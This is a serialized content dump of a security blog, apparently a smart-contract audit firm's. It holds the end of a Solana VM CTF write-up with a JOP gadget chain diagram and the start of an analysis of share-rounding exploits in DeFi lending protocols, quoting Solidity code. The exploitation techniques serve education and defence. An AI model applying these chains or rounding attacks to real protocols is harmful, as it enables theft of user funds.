":207,"props":52681,"children":52682},{"style":226},[52683],{"type":33,"value":8968},{"type":27,"tag":207,"props":52685,"children":52686},{"style":8920},[52687],{"type":33,"value":20474},{"type":27,"tag":36,"props":52689,"children":52690},{},[52691,52693,52698,52700,52707],{"type":33,"value":52692},"The source of ",{"type":27,"tag":47,"props":52694,"children":52696},{"href":52695},"(https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/program.rs#L289)",[52697],{"type":33,"value":51315},{"type":33,"value":52699}," helps a lot, but looking at the actual ",{"type":27,"tag":47,"props":52701,"children":52704},{"href":52702,"rel":52703},"https://github.com/solana-labs/solana/blob/v1.17.4/programs/bpf_loader/src/syscalls/cpi.rs#L458-L637",[51],[52705],{"type":33,"value":52706},"implementation",{"type":33,"value":52708}," provides more clarity:",{"type":27,"tag":1228,"props":52710,"children":52711},{},[52712],{"type":27,"tag":1232,"props":52713,"children":52714},{},[52715,52720,52722,52729],{"type":27,"tag":84,"props":52716,"children":52718},{"className":52717},[],[52719],{"type":33,"value":52575},{"type":33,"value":52721}," points to a ",{"type":27,"tag":47,"props":52723,"children":52726},{"href":52724,"rel":52725},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/stable_layout/stable_instruction.rs#L33",[51],[52727],{"type":33,"value":52728},"StableInstruction",{"type":33,"value":736},{"type":27,"tag":36,"props":52731,"children":52732},{},[52733],{"type":27,"tag":126,"props":52734,"children":52736},{"alt":52728,"src":52735},"/posts/jumping-around-in-the-vm/stable_ix.svg",[],{"type":27,"tag":1228,"props":52738,"children":52739},{},[52740,52765],{"type":27,"tag":1232,"props":52741,"children":52742},{},[52743,52748,52750,52755,52757,52764],{"type":27,"tag":84,"props":52744,"children":52746},{"className":52745},[],[52747],{"type":33,"value":52600},{"type":33,"value":52749}," points to a slice of ",{"type":27,"tag":84,"props":52751,"children":52753},{"className":52752},[],[52754],{"type":33,"value":52625},{"type":33,"value":52756}," ",{"type":27,"tag":47,"props":52758,"children":52761},{"href":52759,"rel":52760},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/account_info.rs#L19-L36",[51],[52762],{"type":33,"value":52763},"AccountInfos",{"type":33,"value":1041},{"type":27,"tag":1232,"props":52766,"children":52767},{},[52768,52773,52775,52780,52782,52787],{"type":27,"tag":84,"props":52769,"children":52771},{"className":52770},[],[52772],{"type":33,"value":52642},{"type":33,"value":52774}," is a bit trickier, it points to a slice of length ",{"type":27,"tag":84,"props":52776,"children":52778},{"className":52777},[],[52779],{"type":33,"value":52667},{"type":33,"value":52781},", containing slices of ",{"type":27,"tag":84,"props":52783,"children":52785},{"className":52784},[],[52786],{"type":33,"value":10709},{"type":33,"value":1041},{"type":27,"tag":36,"props":52789,"children":52790},{},[52791],{"type":27,"tag":126,"props":52792,"children":52795},{"alt":52793,"src":52794},"signers.drawio","/posts/jumping-around-in-the-vm/signers.svg",[],{"type":27,"tag":36,"props":52797,"children":52798},{},[52799,52801,52806],{"type":33,"value":52800},"Where do we store those fake parameters? We can store them directly inside the input data, and just write the pointers to them on the stack through the write gadget. Note that these writes are to ",{"type":27,"tag":942,"props":52802,"children":52803},{},[52804],{"type":33,"value":52805},"future call frames",{"type":33,"value":1041},{"type":27,"tag":36,"props":52808,"children":52809},{},[52810,52812,52819],{"type":33,"value":52811},"Now that we have all the parts, all we need is to string it together. The full ",{"type":27,"tag":47,"props":52813,"children":52816},{"href":52814,"rel":52815},"https://github.com/chen-robert/paradigmctf-2023/blob/main/jotterp/framework-solve/src/main.rs",[51],[52817],{"type":33,"value":52818},"reference solution can be found here",{"type":33,"value":1041},{"type":27,"tag":36,"props":52821,"children":52822},{},[52823],{"type":33,"value":52824},"Here's a visualization of the final JOP chain.",{"type":27,"tag":101,"props":52826,"children":52828},{"className":51197,"code":52827,"language":51199,"meta":7,"style":7},"graph BT\n A[0: entrypoint] --> B[1: process_instruction]\n B --> C[2: process]\n C --> D[3: Write account_infos.ptr to target_r10 - 136]\n C --> E[3: process]\n E --> F[4: Write account_infos.len to target_r10 - 128]\n E --> G[4: process]\n G --> H[5: Write signers_seeds.ptr to target_r10 - 152]\n G --> I[5: process]\n I --> J[6: Write signers_seeds.len to target_r10 - 144]\n I --> K[6: process]\n K --> M[7: Write HeapBase to target_r10 - 120]\n K --> N[7: process]\n N --> P[8: Invoke CPI Gadget with R0 pointing to the CreateAccount instruction]\n N --> O[8: Write 0x4337 to the account]\n",[52829],{"type":27,"tag":84,"props":52830,"children":52831},{"__ignoreMap":7},[52832,52840,52847,52854,52862,52869,52877,52885,52893,52901,52909,52917,52925,52933,52941],{"type":27,"tag":207,"props":52833,"children":52834},{"class":209,"line":210},[52835],{"type":27,"tag":207,"props":52836,"children":52837},{},[52838],{"type":33,"value":52839},"graph BT\n",{"type":27,"tag":207,"props":52841,"children":52842},{"class":209,"line":244},[52843],{"type":27,"tag":207,"props":52844,"children":52845},{},[52846],{"type":33,"value":51219},{"type":27,"tag":207,"props":52848,"children":52849},{"class":209,"line":270},[52850],{"type":27,"tag":207,"props":52851,"children":52852},{},[52853],{"type":33,"value":51227},{"type":27,"tag":207,"props":52855,"children":52856},{"class":209,"line":296},[52857],{"type":27,"tag":207,"props":52858,"children":52859},{},[52860],{"type":33,"value":52861}," C --> D[3: Write account_infos.ptr to target_r10 - 136]\n",{"type":27,"tag":207,"props":52863,"children":52864},{"class":209,"line":445},[52865],{"type":27,"tag":207,"props":52866,"children":52867},{},[52868],{"type":33,"value":51243},{"type":27,"tag":207,"props":52870,"children":52871},{"class":209,"line":867},[52872],{"type":27,"tag":207,"props":52873,"children":52874},{},[52875],{"type":33,"value":52876}," E --> F[4: Write account_infos.len to target_r10 - 128]\n",{"type":27,"tag":207,"props":52878,"children":52879},{"class":209,"line":892},[52880],{"type":27,"tag":207,"props":52881,"children":52882},{},[52883],{"type":33,"value":52884}," E --> G[4: process]\n",{"type":27,"tag":207,"props":52886,"children":52887},{"class":209,"line":1475},[52888],{"type":27,"tag":207,"props":52889,"children":52890},{},[52891],{"type":33,"value":52892}," G --> H[5: Write signers_seeds.ptr to target_r10 - 152]\n",{"type":27,"tag":207,"props":52894,"children":52895},{"class":209,"line":2065},[52896],{"type":27,"tag":207,"props":52897,"children":52898},{},[52899],{"type":33,"value":52900}," G --> I[5: process]\n",{"type":27,"tag":207,"props":52902,"children":52903},{"class":209,"line":2092},[52904],{"type":27,"tag":207,"props":52905,"children":52906},{},[52907],{"type":33,"value":52908}," I --> J[6: Write signers_seeds.len to target_r10 - 144]\n",{"type":27,"tag":207,"props":52910,"children":52911},{"class":209,"line":2130},[52912],{"type":27,"tag":207,"props":52913,"children":52914},{},[52915],{"type":33,"value":52916}," I --> K[6: process]\n",{"type":27,"tag":207,"props":52918,"children":52919},{"class":209,"line":2168},[52920],{"type":27,"tag":207,"props":52921,"children":52922},{},[52923],{"type":33,"value":52924}," K --> M[7: Write HeapBase to target_r10 - 120]\n",{"type":27,"tag":207,"props":52926,"children":52927},{"class":209,"line":4095},[52928],{"type":27,"tag":207,"props":52929,"children":52930},{},[52931],{"type":33,"value":52932}," K --> N[7: process]\n",{"type":27,"tag":207,"props":52934,"children":52935},{"class":209,"line":4103},[52936],{"type":27,"tag":207,"props":52937,"children":52938},{},[52939],{"type":33,"value":52940}," N --> P[8: Invoke CPI Gadget with R0 pointing to the CreateAccount instruction]\n",{"type":27,"tag":207,"props":52942,"children":52943},{"class":209,"line":4154},[52944],{"type":27,"tag":207,"props":52945,"children":52946},{},[52947],{"type":33,"value":52948}," N --> O[8: Write 0x4337 to the account]\n",{"type":27,"tag":36,"props":52950,"children":52951},{},[52952,52954,52960],{"type":33,"value":52953},"Small note: ",{"type":27,"tag":84,"props":52955,"children":52957},{"className":52956},[],[52958],{"type":33,"value":52959},"target_r10",{"type":33,"value":52961}," is the address of the call frame when the CPI gadget is invoked, which, as shown in the graph, is the 8th frame. Its address can be calculated as follows:",{"type":27,"tag":101,"props":52963,"children":52965},{"className":10270,"code":52964,"language":10269,"meta":7,"style":7},"fn call_frame_addr(depth: u64) -> u64 {\n 0x200000000 + 0x2000 * depth + 0x1000\n}\n// call_frame_addr(8) = 0x200011000\n",[52966],{"type":27,"tag":84,"props":52967,"children":52968},{"__ignoreMap":7},[52969,53014,53049,53056],{"type":27,"tag":207,"props":52970,"children":52971},{"class":209,"line":210},[52972,52976,52981,52985,52990,52994,52998,53002,53006,53010],{"type":27,"tag":207,"props":52973,"children":52974},{"style":214},[52975],{"type":33,"value":27538},{"type":27,"tag":207,"props":52977,"children":52978},{"style":1335},[52979],{"type":33,"value":52980}," call_frame_addr",{"type":27,"tag":207,"props":52982,"children":52983},{"style":238},[52984],{"type":33,"value":1343},{"type":27,"tag":207,"props":52986,"children":52987},{"style":220},[52988],{"type":33,"value":52989},"depth",{"type":27,"tag":207,"props":52991,"children":52992},{"style":226},[52993],{"type":33,"value":736},{"type":27,"tag":207,"props":52995,"children":52996},{"style":8920},[52997],{"type":33,"value":13142},{"type":27,"tag":207,"props":52999,"children":53000},{"style":238},[53001],{"type":33,"value":2222},{"type":27,"tag":207,"props":53003,"children":53004},{"style":226},[53005],{"type":33,"value":8968},{"type":27,"tag":207,"props":53007,"children":53008},{"style":8920},[53009],{"type":33,"value":13142},{"type":27,"tag":207,"props":53011,"children":53012},{"style":238},[53013],{"type":33,"value":384},{"type":27,"tag":207,"props":53015,"children":53016},{"class":209,"line":244},[53017,53022,53026,53031,53035,53040,53044],{"type":27,"tag":207,"props":53018,"children":53019},{"style":232},[53020],{"type":33,"value":53021}," 0x200000000",{"type":27,"tag":207,"props":53023,"children":53024},{"style":226},[53025],{"type":33,"value":1374},{"type":27,"tag":207,"props":53027,"children":53028},{"style":232},[53029],{"type":33,"value":53030}," 0x2000",{"type":27,"tag":207,"props":53032,"children":53033},{"style":226},[53034],{"type":33,"value":17093},{"type":27,"tag":207,"props":53036,"children":53037},{"style":220},[53038],{"type":33,"value":53039}," depth",{"type":27,"tag":207,"props":53041,"children":53042},{"style":226},[53043],{"type":33,"value":1374},{"type":27,"tag":207,"props":53045,"children":53046},{"style":232},[53047],{"type":33,"value":53048}," 0x1000\n",{"type":27,"tag":207,"props":53050,"children":53051},{"class":209,"line":270},[53052],{"type":27,"tag":207,"props":53053,"children":53054},{"style":238},[53055],{"type":33,"value":451},{"type":27,"tag":207,"props":53057,"children":53058},{"class":209,"line":296},[53059],{"type":27,"tag":207,"props":53060,"children":53061},{"style":4647},[53062],{"type":33,"value":53063},"// call_frame_addr(8) = 0x200011000\n",{"type":27,"tag":28,"props":53065,"children":53066},{"id":10112},[53067],{"type":33,"value":10115},{"type":27,"tag":36,"props":53069,"children":53070},{},[53071,53073,53080],{"type":33,"value":53072},"Most blockchain vulnerabilities are high-level business logic bugs. While low-level Solana bugs are rare, ",{"type":27,"tag":47,"props":53074,"children":53077},{"href":53075,"rel":53076},"https://osec.io/blog/2022-12-09-rust-realloc-and-references",[51],[53078],{"type":33,"value":53079},"they do exist",{"type":33,"value":1041},{"type":27,"tag":36,"props":53082,"children":53083},{},[53084],{"type":33,"value":53085},"In this blog post, we provided an exploration of the exploitation side of security. There's a surprising amount of work necessary to go from powerful memory corruption primitives to full control of the program.",{"type":27,"tag":36,"props":53087,"children":53088},{},[53089,53091,53096],{"type":33,"value":53090},"Security requires a top-to-bottom understanding of the execution environment. We hope this challenge and blog post motivate others to understand the ",{"type":27,"tag":942,"props":53092,"children":53093},{},[53094],{"type":33,"value":53095},"entire",{"type":33,"value":53097}," runtime.",{"type":27,"tag":10127,"props":53099,"children":53100},{},[53101],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":53103},[53104,53108,53109,53112],{"id":26226,"depth":244,"text":26229,"children":53105},[53106,53107],{"id":47786,"depth":270,"text":47789},{"id":49104,"depth":270,"text":49107},{"id":50343,"depth":244,"text":50346},{"id":51179,"depth":244,"text":51182,"children":53110},[53111],{"id":51293,"depth":270,"text":51296},{"id":10112,"depth":244,"text":10115},"content:blog:2023-12-11-jumping-around-in-the-vm.md","blog/2023-12-11-jumping-around-in-the-vm.md","blog/2023-12-11-jumping-around-in-the-vm",{"_path":53117,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":53118,"description":53119,"author":53120,"image":53121,"date":53123,"isFeatured":19,"onBlogPage":19,"body":53124,"_type":10152,"_id":54269,"_source":10154,"_file":54270,"_stem":54271,"_extension":10157},"/blog/2024-01-18-rounding-bugs","Rounding Bugs: An Analysis","Rounding-related hacks are having a moment in the spotlight. We explore these exploits, correct some popular misunderstandings, and provide mitigations.",[13003],{"src":53122},"/posts/rounding-bugs/cover.png","2024-01-18",{"type":24,"children":53125,"toc":54258},[53126,53130,53158,53163,53176,53181,53187,53192,53197,53202,53207,53220,53232,53252,53272,53277,53282,53300,53306,53311,53317,53331,53344,53349,53355,53369,53374,53396,53629,53634,53639,53652,53892,53902,53907,53913,53918,53923,53956,53961,53972,53978,53983,53997,54124,54138,54214,54219,54230,54235,54240,54244,54249,54254],{"type":27,"tag":28,"props":53127,"children":53128},{"id":30},[53129],{"type":33,"value":34},{"type":27,"tag":36,"props":53131,"children":53132},{},[53133,53135,53142,53143,53150,53152,53157],{"type":33,"value":53134},"Recently, there's been a series of attacks exploiting share rounding against lending protocols. Rounding attacks are already known to developers on ",{"type":27,"tag":47,"props":53136,"children":53139},{"href":53137,"rel":53138},"https://neodyme.io/de/blog/lending_disclosure",[51],[53140],{"type":33,"value":53141},"fast",{"type":33,"value":1123},{"type":27,"tag":47,"props":53144,"children":53147},{"href":53145,"rel":53146},"https://osec.io/blog/2022-04-26-spl-swap-rounding",[51],[53148],{"type":33,"value":53149},"cheap",{"type":33,"value":53151}," chains with high-value tokens. These attacks are novel in that they also work against low-value tokens on expensive chains. ",{"type":27,"tag":942,"props":53153,"children":53154},{},[53155],{"type":33,"value":53156},"Most people haven't considered what happens when shares are worth a lot",{"type":33,"value":1041},{"type":27,"tag":36,"props":53159,"children":53160},{},[53161],{"type":33,"value":53162},"Much of the previous discourse has mischaracterized the rootcause of these hacks. For example, the presence of flashloans is largely irrelevant. At a high level, these attacks only require two key steps:",{"type":27,"tag":12719,"props":53164,"children":53165},{},[53166,53171],{"type":27,"tag":1232,"props":53167,"children":53168},{},[53169],{"type":33,"value":53170},"Inflate share value (token to share conversion rate)",{"type":27,"tag":1232,"props":53172,"children":53173},{},[53174],{"type":33,"value":53175},"Exploit rounding bug",{"type":27,"tag":36,"props":53177,"children":53178},{},[53179],{"type":33,"value":53180},"In this blog post, we explore these attacks in detail and provide potential mitigations.",{"type":27,"tag":28,"props":53182,"children":53184},{"id":53183},"model",[53185],{"type":33,"value":53186},"Model",{"type":27,"tag":36,"props":53188,"children":53189},{},[53190],{"type":33,"value":53191},"Before we dive in, there's some helpful background information we'll share first.",{"type":27,"tag":36,"props":53193,"children":53194},{},[53195],{"type":33,"value":53196},"A common form of accounting is the share and token model. When a user deposits a token, they receive back shares. Shares can accrue value, whether through interest or protocol fees.",{"type":27,"tag":36,"props":53198,"children":53199},{},[53200],{"type":33,"value":53201},"When users want to withdraw their tokens, they burn shares and receive the corresponding amount of tokens back. This is nice in theory. Unfortunately, in the real world, we have fixed precision. You can't have 1.01 shares, it needs to be either one or two. Which way should we round?",{"type":27,"tag":36,"props":53203,"children":53204},{},[53205],{"type":33,"value":53206},"This question is more complex than it may appear. Let's walk through an example.",{"type":27,"tag":36,"props":53208,"children":53209},{},[53210,53212,53218],{"type":33,"value":53211},"Say we initialize shares and tokens in a one-to-one ratio. After an initial deposit of 1000 tokens, the pool state is ",{"type":27,"tag":84,"props":53213,"children":53215},{"className":53214},[],[53216],{"type":33,"value":53217},"1000:1000",{"type":33,"value":53219}," (1000 tokens to 1000 shares).",{"type":27,"tag":36,"props":53221,"children":53222},{},[53223,53225,53231],{"type":33,"value":53224},"After accruing fees, the pool gains one token for a new ratio of ",{"type":27,"tag":84,"props":53226,"children":53228},{"className":53227},[],[53229],{"type":33,"value":53230},"1001:1000",{"type":33,"value":1041},{"type":27,"tag":36,"props":53233,"children":53234},{},[53235,53237,53243,53245,53250],{"type":33,"value":53236},"How many tokens should we get back when withdrawing 999 shares? The real answer is ",{"type":27,"tag":84,"props":53238,"children":53240},{"className":53239},[],[53241],{"type":33,"value":53242},"1001/1000*999 = 999.999",{"type":33,"value":53244},". Unfortunately, we can only send the user 1000 or 999 tokens. For now, let's assume we round ",{"type":27,"tag":942,"props":53246,"children":53247},{},[53248],{"type":33,"value":53249},"down",{"type":33,"value":53251}," against the user.",{"type":27,"tag":36,"props":53253,"children":53254},{},[53255,53257,53263,53265,53271],{"type":33,"value":53256},"If we give the user 999 tokens, the new pool state is ",{"type":27,"tag":84,"props":53258,"children":53260},{"className":53259},[],[53261],{"type":33,"value":53262},"2:1",{"type":33,"value":53264},". The value of a share doubled! What happens if we deposit 1 more token? We'll get back zero shares, further inflating the ratio to ",{"type":27,"tag":84,"props":53266,"children":53268},{"className":53267},[],[53269],{"type":33,"value":53270},"3:1",{"type":33,"value":1041},{"type":27,"tag":36,"props":53273,"children":53274},{},[53275],{"type":33,"value":53276},"Small decisions like rounding direction can have a big impact on share valuation. Generally, share valuation isn't a strict security boundary.",{"type":27,"tag":36,"props":53278,"children":53279},{},[53280],{"type":33,"value":53281},"The above is a bit of a simplification. In practice, there are several protocol-specific design decisions:",{"type":27,"tag":12719,"props":53283,"children":53284},{},[53285,53290,53295],{"type":27,"tag":1232,"props":53286,"children":53287},{},[53288],{"type":33,"value":53289},"Can you deposit and receive back zero shares? If not, you'll need to spend more effort to exploit the rounding error",{"type":27,"tag":1232,"props":53291,"children":53292},{},[53293],{"type":33,"value":53294},"When you withdraw, are you withdrawing shares or tokens?",{"type":27,"tag":1232,"props":53296,"children":53297},{},[53298],{"type":33,"value":53299},"Can you directly manipulate pool state by sending tokens? Hopefully not.",{"type":27,"tag":28,"props":53301,"children":53303},{"id":53302},"decisions",[53304],{"type":33,"value":53305},"Decisions",{"type":27,"tag":36,"props":53307,"children":53308},{},[53309],{"type":33,"value":53310},"Let's assume that we're able to inflate the value of a share. How can we actually exploit this?",{"type":27,"tag":58,"props":53312,"children":53314},{"id":53313},"radiant-capital",[53315],{"type":33,"value":53316},"Radiant Capital",{"type":27,"tag":36,"props":53318,"children":53319},{},[53320,53322,53329],{"type":33,"value":53321},"Radiant Capital was ",{"type":27,"tag":47,"props":53323,"children":53326},{"href":53324,"rel":53325},"https://arbiscan.io/tx/0x1ce7e9a9e3b6dd3293c9067221ac3260858ce119ecb7ca860eac28b2474c7c9b",[51],[53327],{"type":33,"value":53328},"hacked on Jan 2nd",{"type":33,"value":53330}," for about $4.5M. This was the original example of exploiting rounding on otherwise inconsequential shares.",{"type":27,"tag":36,"props":53332,"children":53333},{},[53334,53336,53343],{"type":33,"value":53335},"The exploit is relatively straightforward and ",{"type":27,"tag":47,"props":53337,"children":53340},{"href":53338,"rel":53339},"https://medium.com/@_kcyw/radiant-capital-hack-explained-1633289be150",[51],[53341],{"type":33,"value":53342},"has already been covered previously",{"type":33,"value":1041},{"type":27,"tag":36,"props":53345,"children":53346},{},[53347],{"type":33,"value":53348},"At a high level, this exploit is exactly what you'd expect. If shares were worth $1000 each, and the user tried to withdraw $1999, they only needed to burn one share. Free money.",{"type":27,"tag":58,"props":53350,"children":53352},{"id":53351},"wise-lending",[53353],{"type":33,"value":53354},"Wise Lending",{"type":27,"tag":36,"props":53356,"children":53357},{},[53358,53360,53367],{"type":33,"value":53359},"Wise Lending was ",{"type":27,"tag":47,"props":53361,"children":53364},{"href":53362,"rel":53363},"https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31",[51],[53365],{"type":33,"value":53366},"hacked on January 13th",{"type":33,"value":53368}," for just under $460,000.",{"type":27,"tag":36,"props":53370,"children":53371},{},[53372],{"type":33,"value":53373},"Again, share prices were inflated artificially high. However, the rounding direction seemed to be correct. This was a new variant.",{"type":27,"tag":36,"props":53375,"children":53376},{},[53377,53379,53386,53388,53395],{"type":33,"value":53378},"This is ",{"type":27,"tag":47,"props":53380,"children":53383},{"href":53381,"rel":53382},"https://etherscan.io/address/0x829c3AE2e82760eCEaD0F384918a650F8a31Ba18",[51],[53384],{"type":33,"value":53385},"the code responsible",{"type":33,"value":53387}," for checking if a withdrawal is valid. As a hint, a critical invariant for lending protocols is that there's ",{"type":27,"tag":47,"props":53389,"children":53392},{"href":53390,"rel":53391},"https://www.chainalysis.com/blog/euler-finance-flash-loan-attack/",[51],[53393],{"type":33,"value":53394},"no way to atomically self-bankrupt",{"type":33,"value":1041},{"type":27,"tag":101,"props":53397,"children":53399},{"className":11758,"code":53398,"language":11757,"meta":7,"style":7},"uint256 withdrawValue = WISE_ORACLE.getTokensInETH(\n _poolToken,\n _amount\n)\n * WISE_LENDING.lendingPoolData(_poolToken).collateralFactor\n / PRECISION_FACTOR_E18;\n\nbool state = borrowPercentageCap\n * (overallETHCollateralsWeighted(_nftId) - withdrawValue)\n / PRECISION_FACTOR_E18\n \u003C borrowAmount;\n\nif (state == true) {\n revert ResultsInBadDebt();\n}\n",[53400],{"type":27,"tag":84,"props":53401,"children":53402},{"__ignoreMap":7},[53403,53434,53442,53450,53457,53479,53492,53499,53520,53550,53562,53574,53581,53605,53622],{"type":27,"tag":207,"props":53404,"children":53405},{"class":209,"line":210},[53406,53411,53416,53420,53425,53430],{"type":27,"tag":207,"props":53407,"children":53408},{"style":8920},[53409],{"type":33,"value":53410},"uint256",{"type":27,"tag":207,"props":53412,"children":53413},{"style":238},[53414],{"type":33,"value":53415}," withdrawValue ",{"type":27,"tag":207,"props":53417,"children":53418},{"style":226},[53419],{"type":33,"value":10380},{"type":27,"tag":207,"props":53421,"children":53422},{"style":238},[53423],{"type":33,"value":53424}," WISE_ORACLE.",{"type":27,"tag":207,"props":53426,"children":53427},{"style":1335},[53428],{"type":33,"value":53429},"getTokensInETH",{"type":27,"tag":207,"props":53431,"children":53432},{"style":238},[53433],{"type":33,"value":9090},{"type":27,"tag":207,"props":53435,"children":53436},{"class":209,"line":244},[53437],{"type":27,"tag":207,"props":53438,"children":53439},{"style":238},[53440],{"type":33,"value":53441}," _poolToken,\n",{"type":27,"tag":207,"props":53443,"children":53444},{"class":209,"line":270},[53445],{"type":27,"tag":207,"props":53446,"children":53447},{"style":238},[53448],{"type":33,"value":53449}," _amount\n",{"type":27,"tag":207,"props":53451,"children":53452},{"class":209,"line":296},[53453],{"type":27,"tag":207,"props":53454,"children":53455},{"style":238},[53456],{"type":33,"value":10449},{"type":27,"tag":207,"props":53458,"children":53459},{"class":209,"line":445},[53460,53464,53469,53474],{"type":27,"tag":207,"props":53461,"children":53462},{"style":226},[53463],{"type":33,"value":24832},{"type":27,"tag":207,"props":53465,"children":53466},{"style":238},[53467],{"type":33,"value":53468}," WISE_LENDING.",{"type":27,"tag":207,"props":53470,"children":53471},{"style":1335},[53472],{"type":33,"value":53473},"lendingPoolData",{"type":27,"tag":207,"props":53475,"children":53476},{"style":238},[53477],{"type":33,"value":53478},"(_poolToken).collateralFactor\n",{"type":27,"tag":207,"props":53480,"children":53481},{"class":209,"line":867},[53482,53487],{"type":27,"tag":207,"props":53483,"children":53484},{"style":226},[53485],{"type":33,"value":53486}," /",{"type":27,"tag":207,"props":53488,"children":53489},{"style":238},[53490],{"type":33,"value":53491}," PRECISION_FACTOR_E18;\n",{"type":27,"tag":207,"props":53493,"children":53494},{"class":209,"line":892},[53495],{"type":27,"tag":207,"props":53496,"children":53497},{"emptyLinePlaceholder":19},[53498],{"type":33,"value":2062},{"type":27,"tag":207,"props":53500,"children":53501},{"class":209,"line":1475},[53502,53506,53511,53515],{"type":27,"tag":207,"props":53503,"children":53504},{"style":8920},[53505],{"type":33,"value":36947},{"type":27,"tag":207,"props":53507,"children":53508},{"style":238},[53509],{"type":33,"value":53510}," state ",{"type":27,"tag":207,"props":53512,"children":53513},{"style":226},[53514],{"type":33,"value":10380},{"type":27,"tag":207,"props":53516,"children":53517},{"style":238},[53518],{"type":33,"value":53519}," borrowPercentageCap\n",{"type":27,"tag":207,"props":53521,"children":53522},{"class":209,"line":2065},[53523,53527,53531,53536,53541,53545],{"type":27,"tag":207,"props":53524,"children":53525},{"style":226},[53526],{"type":33,"value":24832},{"type":27,"tag":207,"props":53528,"children":53529},{"style":238},[53530],{"type":33,"value":686},{"type":27,"tag":207,"props":53532,"children":53533},{"style":1335},[53534],{"type":33,"value":53535},"overallETHCollateralsWeighted",{"type":27,"tag":207,"props":53537,"children":53538},{"style":238},[53539],{"type":33,"value":53540},"(_nftId) ",{"type":27,"tag":207,"props":53542,"children":53543},{"style":226},[53544],{"type":33,"value":11611},{"type":27,"tag":207,"props":53546,"children":53547},{"style":238},[53548],{"type":33,"value":53549}," withdrawValue)\n",{"type":27,"tag":207,"props":53551,"children":53552},{"class":209,"line":2092},[53553,53557],{"type":27,"tag":207,"props":53554,"children":53555},{"style":226},[53556],{"type":33,"value":53486},{"type":27,"tag":207,"props":53558,"children":53559},{"style":238},[53560],{"type":33,"value":53561}," PRECISION_FACTOR_E18\n",{"type":27,"tag":207,"props":53563,"children":53564},{"class":209,"line":2130},[53565,53569],{"type":27,"tag":207,"props":53566,"children":53567},{"style":226},[53568],{"type":33,"value":39703},{"type":27,"tag":207,"props":53570,"children":53571},{"style":238},[53572],{"type":33,"value":53573}," borrowAmount;\n",{"type":27,"tag":207,"props":53575,"children":53576},{"class":209,"line":2168},[53577],{"type":27,"tag":207,"props":53578,"children":53579},{"emptyLinePlaceholder":19},[53580],{"type":33,"value":2062},{"type":27,"tag":207,"props":53582,"children":53583},{"class":209,"line":4095},[53584,53588,53593,53597,53601],{"type":27,"tag":207,"props":53585,"children":53586},{"style":376},[53587],{"type":33,"value":9023},{"type":27,"tag":207,"props":53589,"children":53590},{"style":238},[53591],{"type":33,"value":53592}," (state ",{"type":27,"tag":207,"props":53594,"children":53595},{"style":226},[53596],{"type":33,"value":15856},{"type":27,"tag":207,"props":53598,"children":53599},{"style":214},[53600],{"type":33,"value":19746},{"type":27,"tag":207,"props":53602,"children":53603},{"style":238},[53604],{"type":33,"value":1424},{"type":27,"tag":207,"props":53606,"children":53607},{"class":209,"line":4103},[53608,53613,53618],{"type":27,"tag":207,"props":53609,"children":53610},{"style":376},[53611],{"type":33,"value":53612}," revert",{"type":27,"tag":207,"props":53614,"children":53615},{"style":1335},[53616],{"type":33,"value":53617}," ResultsInBadDebt",{"type":27,"tag":207,"props":53619,"children":53620},{"style":238},[53621],{"type":33,"value":4301},{"type":27,"tag":207,"props":53623,"children":53624},{"class":209,"line":4154},[53625],{"type":27,"tag":207,"props":53626,"children":53627},{"style":238},[53628],{"type":33,"value":451},{"type":27,"tag":36,"props":53630,"children":53631},{},[53632],{"type":33,"value":53633},"The critical observation is that this code operates on token amounts, while the internal accounting necessarily operates on shares.",{"type":27,"tag":36,"props":53635,"children":53636},{},[53637],{"type":33,"value":53638},"Consider: you have one share worth $1000 and (correctly) can borrow $500. If you tried to withdraw $1, the code would round up to withdraw your one share worth $1000, causing you to be immediately liquidatable!",{"type":27,"tag":36,"props":53640,"children":53641},{},[53642,53644,53650],{"type":33,"value":53643},"And indeed, ",{"type":27,"tag":47,"props":53645,"children":53648},{"href":53646,"rel":53647},"https://etherscan.io/address/0x37e49bf3749513A02FA535F0CbC383796E8107E4",[51],[53649],{"type":33,"value":53354},{"type":33,"value":53651}," rounds up the share value.",{"type":27,"tag":101,"props":53653,"children":53655},{"className":11758,"code":53654,"language":11757,"meta":7,"style":7},"function _calculateShares(\n uint256 _product,\n uint256 _pseudo,\n bool _maxSharePrice\n)\n private\n pure\n returns (uint256)\n{\n return _maxSharePrice == true\n ? _product % _pseudo == 0\n ? _product / _pseudo\n : _product / _pseudo + 1\n : _product / _pseudo;\n}\n",[53656],{"type":27,"tag":84,"props":53657,"children":53658},{"__ignoreMap":7},[53659,53675,53692,53708,53721,53728,53736,53744,53764,53771,53792,53813,53835,53864,53885],{"type":27,"tag":207,"props":53660,"children":53661},{"class":209,"line":210},[53662,53666,53671],{"type":27,"tag":207,"props":53663,"children":53664},{"style":214},[53665],{"type":33,"value":38637},{"type":27,"tag":207,"props":53667,"children":53668},{"style":1335},[53669],{"type":33,"value":53670}," _calculateShares",{"type":27,"tag":207,"props":53672,"children":53673},{"style":238},[53674],{"type":33,"value":9090},{"type":27,"tag":207,"props":53676,"children":53677},{"class":209,"line":244},[53678,53683,53688],{"type":27,"tag":207,"props":53679,"children":53680},{"style":8920},[53681],{"type":33,"value":53682}," uint256",{"type":27,"tag":207,"props":53684,"children":53685},{"style":220},[53686],{"type":33,"value":53687}," _product",{"type":27,"tag":207,"props":53689,"children":53690},{"style":238},[53691],{"type":33,"value":1842},{"type":27,"tag":207,"props":53693,"children":53694},{"class":209,"line":270},[53695,53699,53704],{"type":27,"tag":207,"props":53696,"children":53697},{"style":8920},[53698],{"type":33,"value":53682},{"type":27,"tag":207,"props":53700,"children":53701},{"style":220},[53702],{"type":33,"value":53703}," _pseudo",{"type":27,"tag":207,"props":53705,"children":53706},{"style":238},[53707],{"type":33,"value":1842},{"type":27,"tag":207,"props":53709,"children":53710},{"class":209,"line":296},[53711,53716],{"type":27,"tag":207,"props":53712,"children":53713},{"style":8920},[53714],{"type":33,"value":53715}," bool",{"type":27,"tag":207,"props":53717,"children":53718},{"style":220},[53719],{"type":33,"value":53720}," 